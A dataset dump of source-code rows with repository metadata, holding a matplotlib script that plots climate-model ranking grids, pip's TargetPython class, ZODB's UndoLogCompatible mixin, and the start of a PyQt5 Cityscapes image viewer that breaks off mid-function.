hexsha stringlengths 40 40 | size int64 4 1.02M | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 209 | max_stars_repo_name stringlengths 5 121 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 209 | max_issues_repo_name stringlengths 5 121 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 209 | max_forks_repo_name stringlengths 5 121 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 1.02M | avg_line_length float64 1.07 66.1k | max_line_length int64 4 266k | alphanum_fraction float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e72dedc6f276d06e4eeffe8f27a5436c09e1ef11 | 6,721 | py | Python | Dark_Scripts/plot_MS-Figure_3_v1_DARK.py | zmlabe/ModelBiasesANN | df28842a8594870db3282682b1261af5058af832 | [
"MIT"
] | 1 | 2022-02-12T11:56:54.000Z | 2022-02-12T11:56:54.000Z | Dark_Scripts/plot_MS-Figure_3_v1_DARK.py | zmlabe/ModelBiasesANN | df28842a8594870db3282682b1261af5058af832 | [
"MIT"
] | null | null | null | Dark_Scripts/plot_MS-Figure_3_v1_DARK.py | zmlabe/ModelBiasesANN | df28842a8594870db3282682b1261af5058af832 | [
"MIT"
] | null | null | null | """
Script to plot figure 3
Author : Zachary M. Labe
Date : 7 July 2021
Version : 1
"""
### Import packages
import sys
import matplotlib.pyplot as plt
import matplotlib.colors as c
import numpy as np
import palettable.cubehelix as cm
import palettable.scientific.sequential as sss
import palettable.cartocolors.qualitative as cc
import cmocean as cmocean
import cmasher as cmr
import calc_Utilities as UT
import scipy.stats as sts

### Plotting defaults (dark theme: black background, grey axes/tick labels)
plt.rc('text',usetex=True)
plt.rc('font',**{'family':'sans-serif','sans-serif':['Avant Garde']})
plt.rc('savefig',facecolor='black')
plt.rc('axes',edgecolor='darkgrey')
plt.rc('xtick',color='darkgrey')
plt.rc('ytick',color='darkgrey')
plt.rc('axes',labelcolor='darkgrey')
plt.rc('axes',facecolor='black')

### Set parameters
directorydata = '/Users/zlabe/Documents/Research/ModelComparison/Data/MSFigures_v1/'
directoryfigure = '/Users/zlabe/Documents/Projects/ModelBiasesANN/Dark_Figures/'
variablesall = ['T2M']
allDataLabels = ['CanESM2','MPI','CSIRO-MK3.6','EC-EARTH','GFDL-CM3','GFDL-ESM2M','LENS','MM-Mean']
letters = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p"]
THRESH = 0.05

### Read in data
# Each array is a (model, year) grid of integer ranks; presumably rows match
# allDataLabels and columns are years 1950-2019 -- TODO confirm against the
# script that produced the .npy files.
globe = np.load(directorydata + 'Ranks_thresh-%s_%s.npy' % (THRESH,'SMILEGlobe'))
arctic = np.load(directorydata + 'Ranks_thresh-%s_%s.npy' % (THRESH,'LowerArctic'))

###############################################################################
###############################################################################
###############################################################################
###############################################################################
### Plot first meshgrid (upper panel: global ranks)
fig = plt.figure()
ax = plt.subplot(211)
ax.spines['top'].set_color('none')
ax.spines['right'].set_color('none')
ax.spines['bottom'].set_color('none')
ax.spines['left'].set_color('none')
ax.get_xaxis().set_tick_params(direction='out', width=2,length=3,
                               color='darkgrey')
ax.get_yaxis().set_tick_params(direction='out', width=2,length=3,
                               color='darkgrey')
plt.tick_params(
    axis='x',           # changes apply to the x-axis
    which='both',       # both major and minor ticks are affected
    bottom='on',        # ticks along the bottom edge are off
    top=False,          # ticks along the top edge are off
    labelbottom='off')
plt.tick_params(
    axis='y',           # changes apply to the x-axis
    which='both',       # both major and minor ticks are affected
    left='on',          # ticks along the bottom edge are off
    right=False,        # ticks along the top edge are off
    labelleft='on')
csm=cm.cubehelix2_16_r.mpl_colormap
norm = c.BoundaryNorm(np.arange(1,9+1,1),csm.N)
# NOTE(review): shading='faceted' is a legacy option removed in newer
# matplotlib releases; edgecolor/linewidth provide the cell borders here.
cs = plt.pcolormesh(globe,shading='faceted',edgecolor='darkgrey',
                    linewidth=0.05,vmin=1,vmax=8,norm=norm,cmap=csm,clip_on=False)
plt.yticks(np.arange(0.5,8.5,1),allDataLabels,ha='right',va='center',color='w',size=6)
yax = ax.get_yaxis()
yax.set_tick_params(pad=2)
plt.xticks([])
plt.xlim([0,70])
# Overlay the integer rank inside every grid cell.
for i in range(globe.shape[0]):
    for j in range(globe.shape[1]):
        # NOTE(review): `cc` rebinds the palettable import alias above;
        # harmless here since the alias is never used, but consider renaming.
        cc = 'k'
        plt.text(j+0.5,i+0.5,r'\textbf{%s}' % int(globe[i,j]),fontsize=4,
                 color=cc,va='center',ha='center')

###############################################################################
###############################################################################
###############################################################################
### Second panel: lower-Arctic ranks (same styling, with year tick labels)
ax = plt.subplot(212)
ax.spines['top'].set_color('none')
ax.spines['right'].set_color('none')
ax.spines['bottom'].set_color('none')
ax.spines['left'].set_color('none')
ax.get_xaxis().set_tick_params(direction='out', width=2,length=3,
                               color='darkgrey')
ax.get_yaxis().set_tick_params(direction='out', width=2,length=3,
                               color='darkgrey')
plt.tick_params(
    axis='x',           # changes apply to the x-axis
    which='both',       # both major and minor ticks are affected
    bottom='on',        # ticks along the bottom edge are off
    top=False,          # ticks along the top edge are off
    labelbottom='on')
plt.tick_params(
    axis='y',           # changes apply to the x-axis
    which='both',       # both major and minor ticks are affected
    left='on',          # ticks along the bottom edge are off
    right=False,        # ticks along the top edge are off
    labelleft='on')
csm=cm.cubehelix2_16_r.mpl_colormap
norm = c.BoundaryNorm(np.arange(1,9+1,1),csm.N)
cs = plt.pcolormesh(arctic,shading='faceted',edgecolor='darkgrey',
                    linewidth=0.05,vmin=1,vmax=8,norm=norm,cmap=csm,clip_on=False)
plt.yticks(np.arange(0.5,8.5,1),allDataLabels,ha='right',va='center',color='w',size=6)
yax = ax.get_yaxis()
yax.set_tick_params(pad=2)
plt.xticks(np.arange(0.5,70.5,5),map(str,np.arange(1950,2022,5)),
           color='darkgrey',size=6)
plt.xlim([0,70])
for i in range(arctic.shape[0]):
    for j in range(arctic.shape[1]):
        cc = 'k'
        plt.text(j+0.5,i+0.5,r'\textbf{%s}' % int(arctic[i,j]),fontsize=4,
                 color=cc,va='center',ha='center')

# Rotated panel titles on the right edge of the figure.
plt.annotate(r'\textbf{GLOBAL}',
             textcoords='axes fraction',
             xy=(0,0), xytext=(1.02,1.26),
             fontsize=18,color='darkgrey',alpha=1,rotation=270,va='bottom')
plt.annotate(r'\textbf{ARCTIC}',
             textcoords='axes fraction',
             xy=(0,0), xytext=(1.02,0.17),
             fontsize=18,color='darkgrey',alpha=1,rotation=270,va='bottom')

###############################################################################
### Shared horizontal colorbar for the discrete rank values 1..8
cbar_ax1 = fig.add_axes([0.35,0.11,0.3,0.03])
cbar = fig.colorbar(cs,cax=cbar_ax1,orientation='horizontal',
                    extend='neither',extendfrac=0.07,drawedges=True)
cbar.set_ticks([])
cbar.set_ticklabels([])
cbar.ax.invert_xaxis()
cbar.ax.tick_params(axis='x', size=.001,labelsize=7)
cbar.dividers.set_color('darkgrey')
cbar.dividers.set_linewidth(1)
cbar.outline.set_edgecolor('darkgrey')
cbar.outline.set_linewidth(1)
cbar.set_label(r'\textbf{RELATIVE MODEL CHOICE}',color='w',labelpad=7,fontsize=18)
cbar.ax.get_yaxis().set_ticks([])
# Hand-placed numeric labels centered in each colorbar segment.
for j, lab in enumerate(range(1,9,1)):
    cbar.ax.text((2 * j+2.9)/2, 4.5, lab,ha='center',va='center',
                 size=5,color='darkgrey')

# plt.annotate(r'\textbf{aaaaaaa}',
#              textcoords='figure fraction',
#              xy=(0,0), xytext=(0.38,0.13),ha='center',va='center',
#              fontsize=5,color='crimson',alpha=1,rotation=0,zorder=100)

plt.tight_layout()
plt.subplots_adjust(bottom=0.2,hspace=0.1)
plt.savefig(directoryfigure + 'MS-Figure_3_v1_DARK.png',dpi=1000)
| 38.626437 | 101 | 0.583544 |
a23b79c4e4e9bd0c126dc8162f163cbbe04ca528 | 3,820 | py | Python | virtual/lib/python3.6/site-packages/pip/_internal/models/target_python.py | Ruterana/clone_instagram | a068587ef1d1a93ec8d1c08086bf11c0fb274b83 | [
"MIT"
] | 120 | 2019-11-12T19:22:44.000Z | 2020-05-17T12:17:25.000Z | virtual/lib/python3.6/site-packages/pip/_internal/models/target_python.py | Ruterana/clone_instagram | a068587ef1d1a93ec8d1c08086bf11c0fb274b83 | [
"MIT"
] | 123 | 2019-09-10T14:48:01.000Z | 2019-11-28T21:24:06.000Z | virtual/lib/python3.6/site-packages/pip/_internal/models/target_python.py | Krasivaya/Tracks | c18d1c9222dff39e4678d44495a8a7d9434339ff | [
"MIT"
] | 98 | 2019-10-17T14:48:28.000Z | 2022-01-21T03:33:38.000Z | import sys
from pip._internal.pep425tags import get_supported, version_info_to_nodot
from pip._internal.utils.misc import normalize_version_info
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
if MYPY_CHECK_RUNNING:
from typing import List, Optional, Tuple
from pip._internal.pep425tags import Pep425Tag
class TargetPython(object):
    """
    Describes the Python interpreter that a package operation (install,
    download, ...) is aimed at. All attributes may be None, meaning
    "use the running interpreter's value".
    """

    def __init__(
        self,
        platform=None,          # type: Optional[str]
        py_version_info=None,   # type: Optional[Tuple[int, ...]]
        abi=None,               # type: Optional[str]
        implementation=None,    # type: Optional[str]
    ):
        # type: (...) -> None
        """
        :param platform: A string or None. If None, searches for packages
            that are supported by the current system. Otherwise, will find
            packages that can be built on the platform passed in. These
            packages will only be downloaded for distribution: they will
            not be built locally.
        :param py_version_info: An optional tuple of ints representing the
            Python version information to use (e.g. `sys.version_info[:3]`).
            This can have length 1, 2, or 3 when provided.
        :param abi: A string or None. This is passed to pep425tags.py's
            get_supported() function as is.
        :param implementation: A string or None. This is passed to
            pep425tags.py's get_supported() function as is.
        """
        # Keep the raw argument: get_tags() and format_given() need to know
        # whether the caller supplied a version explicitly.
        self._given_py_version_info = py_version_info

        if py_version_info is None:
            py_version_info = sys.version_info[:3]
        else:
            py_version_info = normalize_version_info(py_version_info)

        self.abi = abi
        self.implementation = implementation
        self.platform = platform
        self.py_version = '.'.join(map(str, py_version_info[:2]))
        self.py_version_info = py_version_info

        # Lazily-populated cache for get_tags().
        self._valid_tags = None  # type: Optional[List[Pep425Tag]]

    def format_given(self):
        # type: () -> str
        """
        Render the explicitly-given (non-None) attributes for display.
        """
        if self._given_py_version_info is None:
            display_version = None
        else:
            display_version = '.'.join(
                str(part) for part in self._given_py_version_info
            )

        parts = []
        for key, value in [
            ('platform', self.platform),
            ('version_info', display_version),
            ('abi', self.abi),
            ('implementation', self.implementation),
        ]:
            if value is not None:
                parts.append('{}={!r}'.format(key, value))
        return ' '.join(parts)

    def get_tags(self):
        # type: () -> List[Pep425Tag]
        """
        Return the supported PEP 425 tags to check wheel candidates against.

        The tags are returned in order of preference (most preferred first).
        """
        if self._valid_tags is None:
            # Pass versions=None when no explicit version was given, since
            # get_supported() applies special default logic in that case.
            given = self._given_py_version_info
            if given is None:
                versions = None
            else:
                versions = [version_info_to_nodot(given)]

            self._valid_tags = get_supported(
                versions=versions,
                platform=self.platform,
                abi=self.abi,
                impl=self.implementation,
            )
        return self._valid_tags
| 35.700935 | 76 | 0.610471 |
a74641bea6ae48f17f8a757c31b6bf0a10a4306b | 1,540 | py | Python | eggs/ZODB-4.1.0-py2.7.egg/ZODB/UndoLogCompatible.py | salayhin/talkofacta | 8b5a14245dd467bb1fda75423074c4840bd69fb7 | [
"MIT"
] | null | null | null | eggs/ZODB-4.1.0-py2.7.egg/ZODB/UndoLogCompatible.py | salayhin/talkofacta | 8b5a14245dd467bb1fda75423074c4840bd69fb7 | [
"MIT"
] | null | null | null | eggs/ZODB-4.1.0-py2.7.egg/ZODB/UndoLogCompatible.py | salayhin/talkofacta | 8b5a14245dd467bb1fda75423074c4840bd69fb7 | [
"MIT"
] | null | null | null | ##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
"""Provide backward compatibility with storages that only have undoLog()."""
class UndoLogCompatible:
    """Provide backward compatibility with storages that only have undoLog().

    Mix-in: the host class must implement ``undoLog(first, last, filter)``;
    ``undoInfo`` is then expressed in terms of it.
    """

    def undoInfo(self, first=0, last=-20, specification=None):
        """Return undo records in the range [first, last].

        :param specification: optional dict. When given, only records whose
            description is a "superdict" of it -- i.e. contains every
            (key, value) pair of `specification`, and possibly more -- are
            returned.
        """
        if specification:
            # Snapshot the wanted items once so the predicate does not
            # depend on later mutation of `specification`.
            wanted = list(specification.items())

            # Renamed from `filter` to stop shadowing the builtin; the
            # hand-rolled 0/1 loop is replaced by an equivalent all().
            def matches(desc):
                get = desc.get
                return all(get(k, None) == v for k, v in wanted)
        else:
            matches = None
        return self.undoLog(first, last, matches)
| 40.526316 | 78 | 0.551948 |
15bf5bf91fd0716fadb62386a93f248e0e406e1c | 200 | py | Python | Editor/updator/config.py | RangHo/pini-engine | e1407724de32a433b7b46e0ee2469240b70d960b | [
"MIT"
] | null | null | null | Editor/updator/config.py | RangHo/pini-engine | e1407724de32a433b7b46e0ee2469240b70d960b | [
"MIT"
] | null | null | null | Editor/updator/config.py | RangHo/pini-engine | e1407724de32a433b7b46e0ee2469240b70d960b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Runtime configuration selector: prefer the developer config, fall back to
# the live config, and leave `config` as None when neither can be imported.
config = None
try:
    from conf import config_dev as config
except ImportError:
    try:
        from conf import config_live as config
    except ImportError:
        # Narrowed from a bare `except:` so unrelated errors still propagate;
        # print() works under both Python 2 and 3 (the original used a
        # py2-only print statement with a typo'd message).
        print("can not find config py")
| 15.384615 | 40 | 0.705 |
8e34a6237cdfc1e34c5f128942ce88e5ff7584e2 | 45,506 | py | Python | data_scripts/cityscapes/cityscapesscripts/viewer/cityscapesViewer.py | lupvasile/video-seg | d0b1f5ec75c49ee42ba08939451575580ce6f798 | [
"MIT"
] | null | null | null | data_scripts/cityscapes/cityscapesscripts/viewer/cityscapesViewer.py | lupvasile/video-seg | d0b1f5ec75c49ee42ba08939451575580ce6f798 | [
"MIT"
] | null | null | null | data_scripts/cityscapes/cityscapesscripts/viewer/cityscapesViewer.py | lupvasile/video-seg | d0b1f5ec75c49ee42ba08939451575580ce6f798 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
#################
## Import modules
#################
from __future__ import print_function, absolute_import, division
# get command line parameters
import sys
# walk directories
import glob
# access to OS functionality
import os
# call processes
import subprocess
# copy things
import copy
# numpy
import numpy as np
# matplotlib for colormaps
import matplotlib.colors
import matplotlib.cm
from PIL import Image
# the label tool was originally written for python 2 and pyqt4
# in order to enable compatibility with python 3, we need
# to fix the pyqt api to the old version that is default in py2
import sip
apis = ['QDate', 'QDateTime', 'QString', 'QTextStream', 'QTime', 'QUrl', 'QVariant']
for a in apis:
#sip.setapi(a, 1) #does not work on windows
pass
# import pyqt for everything graphical
from PyQt5 import QtGui, QtCore, QtWidgets
#################
## Helper classes
#################
# annotation helper
from cityscapesscripts.helpers.annotation import Annotation, CsObjectType
from cityscapesscripts.helpers.labels import name2label, assureSingleInstanceName
from cityscapesscripts.helpers.labels_cityPersons import name2labelCp
#################
## Main GUI class
#################
# The main class which is a QtGui -> Main Window
class CityscapesViewer(QtWidgets.QMainWindow):
#############################
## Construction / Destruction
#############################
# Constructor
def __init__(self):
    """Construct the viewer window and initialize all default state."""
    # Construct base class
    super(CityscapesViewer, self).__init__()

    # This is the configuration.

    # The filename of the image we currently working on
    self.currentFile = ""
    # The filename of the labels we currently working on
    self.currentLabelFile = ""
    # The path of the images of the currently loaded city
    self.city = ""
    # The name of the currently loaded city
    self.cityName = ""
    # Ground truth type (polygon annotations by default)
    self.gtType = CsObjectType.POLY
    # The path of the labels. In this folder we expect a folder for each city
    # Within these city folders we expect the label with a filename matching
    # the images, except for the extension
    self.labelPath = ""
    # The transparency of the labels over the image
    self.transp = 0.5
    # The zoom toggle
    self.zoom = False
    # The zoom factor
    self.zoomFactor = 1.5
    # The size of the zoom window. Currently there is no setter or getter for that
    self.zoomSize = 400 #px
    # The width that we actually use to show the image
    self.w = 0
    # The height that we actually use to show the image
    self.h = 0
    # The horizontal offset where we start drawing within the widget
    self.xoff = 0
    # The vertical offset where we start drawing withing the widget
    self.yoff = 0
    # A gap that we leave around the image as little border
    self.bordergap = 20
    # The scale that was used, ie
    # self.w = self.scale * self.image.width()
    # self.h = self.scale * self.image.height()
    self.scale = 1.0
    # Filenames of all images in current city
    self.images = []
    # Image extension
    self.imageExt = "_leftImg8bit.png"
    # Ground truth extension
    self.gtExt = "_gt*.json"
    # Current image as QImage
    self.image = QtGui.QImage()
    # Index of the current image within the city folder
    self.idx = 0
    # All annotated objects in current image, i.e. list of csPoly or csBbox
    self.annotation = []
    # The current object the mouse points to. It's index in self.labels
    self.mouseObj = -1
    # The object that is highlighted and its label. An object instance
    self.highlightObj = None
    self.highlightObjLabel = None
    # The position of the mouse
    self.mousePosOrig = None
    # The position of the mouse scaled to label coordinates
    self.mousePosScaled = None
    # If the mouse is outside of the image
    self.mouseOutsideImage = True
    # The position of the mouse upon enabling the zoom window
    self.mousePosOnZoom = None
    # A list of toolbar actions that need an image
    self.actImage = []
    # A list of toolbar actions that need an image that is not the first
    self.actImageNotFirst = []
    # A list of toolbar actions that need an image that is not the last
    self.actImageNotLast = []
    # Toggle status of the play icon
    self.playState = False
    # Enable disparity visu in general
    self.enableDisparity = True
    # Show disparities instead of labels
    self.showDisparity = False
    # The filename of the disparity map we currently working on
    self.currentDispFile = ""
    # The disparity image
    self.dispImg = None
    # As overlay
    self.dispOverlay = None
    # The disparity search path
    self.dispPath = None
    # Disparity extension
    self.dispExt = "_disparity.png"
    # Generate colormap for the depth overlay; if matplotlib's colormap
    # machinery is unavailable, disable the disparity feature entirely.
    try:
        norm = matplotlib.colors.Normalize(vmin=3,vmax=100)
        cmap = matplotlib.cm.plasma
        self.colormap = matplotlib.cm.ScalarMappable( norm=norm , cmap=cmap )
    except:
        self.enableDisparity = False
    # Default label
    self.defaultLabel = 'static'
    if self.defaultLabel not in name2label:
        print('The {0} label is missing in the internal label definitions.'.format(self.defaultLabel))
        return
    # Last selected label
    self.lastLabel = self.defaultLabel

    # Setup the GUI
    self.initUI()

    # If we already know a city from the saved config -> load it
    self.loadCity()
    self.imageChanged()
# Destructor
def __del__(self):
    # Nothing to release explicitly; Qt and Python handle widget teardown.
    return
# Construct everything GUI related. Called by constructor
def initUI(self):
    """Build the toolbar with all actions, the status bar, and the window.

    Actions that only make sense with a loaded image are collected in
    self.actImage / self.actImageNotFirst / self.actImageNotLast so that
    loadImage() can enable/disable them in bulk.
    """
    # Create a toolbar
    self.toolbar = self.addToolBar('Tools')

    # Add the tool buttons
    iconDir = os.path.join( os.path.dirname(__file__) , 'icons' )

    # Loading a new city
    loadAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'open.png' )), '&Tools', self)
    loadAction.setShortcuts(['o'])
    self.setTip( loadAction, 'Open city' )
    loadAction.triggered.connect( self.getCityFromUser )
    self.toolbar.addAction(loadAction)

    # Open previous image
    backAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'back.png')), '&Tools', self)
    backAction.setShortcut('left')
    backAction.setStatusTip('Previous image')
    backAction.triggered.connect( self.prevImage )
    self.toolbar.addAction(backAction)
    self.actImageNotFirst.append(backAction)

    # Open next image
    nextAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'next.png')), '&Tools', self)
    nextAction.setShortcut('right')
    self.setTip( nextAction, 'Next image' )
    nextAction.triggered.connect( self.nextImage )
    self.toolbar.addAction(nextAction)
    self.actImageNotLast.append(nextAction)

    # Play (auto-advance through all images)
    playAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'play.png')), '&Tools', self)
    playAction.setShortcut(' ')
    playAction.setCheckable(True)
    playAction.setChecked(False)
    self.setTip( playAction, 'Play all images' )
    playAction.triggered.connect( self.playImages )
    self.toolbar.addAction(playAction)
    self.actImageNotLast.append(playAction)
    # Keep a handle so nextImage() can un-check it when playback ends.
    self.playAction = playAction

    # Select image
    selImageAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'shuffle.png' )), '&Tools', self)
    selImageAction.setShortcut('i')
    self.setTip( selImageAction, 'Select image' )
    selImageAction.triggered.connect( self.selectImage )
    self.toolbar.addAction(selImageAction)
    self.actImage.append(selImageAction)

    # Enable/disable disparity visu. Toggle button
    if self.enableDisparity:
        dispAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'disp.png' )), '&Tools', self)
        dispAction.setShortcuts(['d'])
        dispAction.setCheckable(True)
        dispAction.setChecked(self.showDisparity)
        self.setTip( dispAction, 'Enable/disable depth visualization' )
        dispAction.toggled.connect( self.dispToggle )
        self.toolbar.addAction(dispAction)
        self.actImage.append(dispAction)

    # Enable/disable zoom. Toggle button
    zoomAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'zoom.png' )), '&Tools', self)
    zoomAction.setShortcuts(['z'])
    zoomAction.setCheckable(True)
    zoomAction.setChecked(self.zoom)
    self.setTip( zoomAction, 'Enable/disable permanent zoom' )
    zoomAction.toggled.connect( self.zoomToggle )
    self.toolbar.addAction(zoomAction)
    self.actImage.append(zoomAction)

    # Decrease transparency
    minusAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'minus.png' )), '&Tools', self)
    minusAction.setShortcut('-')
    self.setTip( minusAction, 'Decrease transparency' )
    minusAction.triggered.connect( self.minus )
    self.toolbar.addAction(minusAction)

    # Increase transparency
    plusAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'plus.png' )), '&Tools', self)
    plusAction.setShortcut('+')
    self.setTip( plusAction, 'Increase transparency' )
    plusAction.triggered.connect( self.plus )
    self.toolbar.addAction(plusAction)

    # Display path to current image in message bar
    displayFilepathAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'filepath.png' )), '&Tools', self)
    displayFilepathAction.setShortcut('f')
    self.setTip( displayFilepathAction, 'Show path to current image' )
    displayFilepathAction.triggered.connect( self.displayFilepath )
    self.toolbar.addAction(displayFilepathAction)

    # Display help message
    helpAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'help19.png' )), '&Tools', self)
    helpAction.setShortcut('h')
    self.setTip( helpAction, 'Help' )
    helpAction.triggered.connect( self.displayHelpMessage )
    self.toolbar.addAction(helpAction)

    # Close the application
    exitAction = QtWidgets.QAction(QtGui.QIcon( os.path.join( iconDir , 'exit.png' )), '&Tools', self)
    exitAction.setShortcuts(['Esc'])
    self.setTip( exitAction, 'Exit' )
    exitAction.triggered.connect( self.close )
    self.toolbar.addAction(exitAction)

    # The default text for the status bar
    self.defaultStatusbar = 'Ready'
    # Create a statusbar. Init with default
    self.statusBar().showMessage( self.defaultStatusbar )

    # Enable mouse move events
    self.setMouseTracking(True)
    self.toolbar.setMouseTracking(True)

    # Open in full screen
    self.showFullScreen( )

    # Set a title
    self.applicationTitle = 'Cityscapes Viewer v1.0'
    self.setWindowTitle(self.applicationTitle)

    #self.displayHelpMessage()
    self.getCityFromUser()

    # And show the application
    self.show()
#############################
## Toolbar call-backs
#############################
# Switch to previous image in file list
# Load the image
# Load its labels
# Update the mouse selection
# View
def prevImage(self):
    """Step back to the previous image of the current city, if any."""
    if not self.images:
        return
    if self.idx == 0:
        # Already at the start of the list -- just tell the user.
        self.statusBar().showMessage("Already at the first image")
        return
    self.idx -= 1
    self.imageChanged()
# Switch to next image in file list
# Load the image
# Load its labels
# Update the mouse selection
# View
def nextImage(self):
    """Advance to the next image; stop autoplay when the end is reached."""
    if not self.images:
        return
    lastIdx = len(self.images) - 1
    if self.idx < lastIdx:
        self.idx += 1
        self.imageChanged()
    elif self.playState:
        # Autoplay hit the final image -> switch playback off.
        self.playState = False
        self.playAction.setChecked(False)
    else:
        self.statusBar().showMessage("Already at the last image")
    if self.playState:
        # Queue the next step on the event loop so the GUI stays responsive.
        QtCore.QTimer.singleShot(0, self.nextImage)
# Play images, i.e. auto-switch to next image
def playImages(self, status):
    """Toggle autoplay; when enabled, schedule a step to the next image."""
    self.playState = status
    if status:
        QtCore.QTimer.singleShot(0, self.nextImage)
# Switch to a selected image of the file list
# Ask the user for an image
# Load the image
# Load its labels
# Update the mouse selection
# View
def selectImage(self):
    """Let the user pick one image of the current city and jump to it."""
    if not self.images:
        return

    dlgTitle = "Select image to load"
    self.statusBar().showMessage(dlgTitle)
    items = [ os.path.basename(i) for i in self.images ]
    # Modal dropdown pre-selected on the currently shown image.
    (item, ok) = QtWidgets.QInputDialog.getItem(self, dlgTitle, "Image", items, self.idx, False)
    if (ok and item):
        idx = items.index(item)
        # Only reload when a different image was chosen.
        if idx != self.idx:
            self.idx = idx
            self.imageChanged()
    else:
        # Restore the message
        self.statusBar().showMessage( self.defaultStatusbar )
# Toggle zoom
def zoomToggle(self, status):
    """Switch the permanent zoom window on/off and repaint."""
    self.zoom = status
    if self.zoom:
        # Anchor the zoom window at the current mouse position.
        self.mousePosOnZoom = self.mousePosOrig
    self.update()
# Toggle disparity visu
def dispToggle(self, status):
    """Switch the depth/disparity overlay on or off and reload the view."""
    self.showDisparity = status
    self.imageChanged()
# Increase label transparency
def minus(self):
    """Lower the overlay opacity by one step (clamped at 0)."""
    self.transp = max(0.0, self.transp - 0.1)
    self.update()
def displayFilepath(self):
    """Show the full path of the displayed image in the status bar."""
    msg = "Current image: {0}".format(self.currentFile)
    self.statusBar().showMessage(msg)
    self.update()
def displayHelpMessage(self):
    """Show a modal about-box with usage instructions and key bindings."""
    message = self.applicationTitle + "\n\n"
    message += "INSTRUCTIONS\n"
    message += " - select a city from drop-down menu\n"
    message += " - browse images and labels using\n"
    message += " the toolbar buttons or the controls below\n"
    message += "\n"
    message += "CONTROLS\n"
    message += " - select city [o]\n"
    message += " - highlight objects [move mouse]\n"
    message += " - next image [left arrow]\n"
    message += " - previous image [right arrow]\n"
    message += " - toggle autoplay [space]\n"
    message += " - increase/decrease label transparency\n"
    message += " [ctrl+mousewheel] or [+ / -]\n"
    # The disparity shortcut is only advertised when the feature is enabled.
    if self.enableDisparity:
        message += " - show disparity/depth overlay (if available) [d]\n"
    message += " - open zoom window [z]\n"
    message += " zoom in/out [mousewheel]\n"
    message += " enlarge/shrink zoom window [shift+mousewheel]\n"
    message += " - select a specific image [i]\n"
    message += " - show path to image below [f]\n"
    message += " - exit viewer [esc]\n"
    QtWidgets.QMessageBox.about(self, "HELP!", message)
    self.update()
# Decrease label transparency
def plus(self):
    """Raise the overlay opacity by one step (clamped at 1)."""
    self.transp = min(1.0, self.transp + 0.1)
    self.update()
# Close the application
def closeEvent(self, event):
    """Accept the window-close request unconditionally."""
    event.accept()
#############################
## Custom events
#############################
def imageChanged(self):
    """Refresh everything that depends on the current image index.

    Order matters: image first, then overlays, then mouse state, then GUI.
    """
    self.loadImage()
    self.loadLabels()
    self.loadDisparities()
    self.updateMouseObject()
    self.update()
#############################
## File I/O
#############################
# Load the currently selected city if possible
def loadCity(self):
    """Rebuild the image list for the currently selected city folder."""
    # clear annotations
    self.annotation = []

    # Search for all *.pngs to get the image list
    self.images = []
    if os.path.isdir(self.city):
        self.images = glob.glob( os.path.join( self.city , '*' + self.imageExt ) )
        self.images.sort()
    # Keep the previously shown image selected if it belongs to this city;
    # otherwise start at the first image.
    if self.currentFile in self.images:
        self.idx = self.images.index(self.currentFile)
    else:
        self.idx = 0
# Load the currently selected image
# Does only load if not previously loaded
# Does not refresh the GUI
def loadImage(self):
    """Load self.images[self.idx] into self.image (skips reload if cached).

    Also enables/disables the toolbar actions that require an image, and
    reports success/failure in the status bar. Does not refresh the GUI.
    """
    success = False
    message = self.defaultStatusbar
    if self.images:
        filename = self.images[self.idx]
        filename = os.path.normpath( filename )
        # Already shown -> nothing to do.
        if not self.image.isNull() and filename == self.currentFile:
            success = True
        else:
            self.image = QtGui.QImage(filename)
            if self.image.isNull():
                message = "Failed to read image: {0}".format( filename )
            else:
                message = "Read image: {0}".format( filename )
                self.currentFile = filename
                success = True

    # Update toolbar actions that need an image
    for act in self.actImage:
        act.setEnabled(success)
    for act in self.actImageNotFirst:
        act.setEnabled(success and self.idx > 0)
    for act in self.actImageNotLast:
        act.setEnabled(success and self.idx < len(self.images)-1)

    self.statusBar().showMessage(message)
# Load the labels from file
# Only loads if they exist
# Otherwise the filename is stored and that's it
def loadLabels(self):
    """Load the annotation JSON matching the current image, if it exists.
